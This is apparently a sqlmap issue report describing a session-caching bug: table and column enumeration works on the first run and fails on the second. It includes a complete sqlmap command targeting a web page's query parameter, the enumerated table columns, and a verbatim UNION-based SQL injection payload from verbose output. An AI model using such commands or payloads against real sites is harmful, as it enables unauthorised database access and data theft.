Table enumeration broken #1564

@colorvamp

Sometimes column enumeration only works the first time you analyze the page, for example:

python ../sqlmap-dev/sqlmap.py --random-agent --output-dir "../db/sqlmap/" -u "http://www.web.com/enviar.php?codigo=4821" --dbs -p codigo --technique=U --columns -D d_db

Database: d_db
Table: content
[11 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| activo  | tinyint(1)   |
| clip    | text         |
| descrip | text         |
| fecha   | date         |
| id      | int(11)      |
| tag1    | varchar(15)  |
| tag2    | varchar(15)  |
| tag3    | varchar(15)  |
| tag4    | varchar(15)  |
| tag5    | varchar(15)  |
| titulo  | varchar(250) |
+---------+--------------+

On the second run I expect sqlmap to use the cached tables, but with exactly the same command, you get:

[21:49:13] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] q

If you use --fresh-queries or --flush-session you can get tables and columns again.
It's strange, because if you use the -v 3 flag, on the first run you get:

[21:51:07] [INFO] the SQL query used returns 12 entries
[21:51:07] [PAYLOAD] -8652' UNION ALL SELECT NULL,NULL,NULL,(SELECT CONCAT(0x71767a7071,IFNULL(CAST(table_name AS CHAR),0x20),0x71706b6a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0xxxxxxxx) LIMIT 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
........

On the second run you only get:

[21:50:10] [INFO] the SQL query used returns 12 entries
[21:50:10] [DEBUG] performed 0 queries in 0.02 seconds
[21:50:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
[21:50:18] [CRITICAL] unable to retrieve the tables in database 'd_db'

Maybe there is some race condition. Thanks
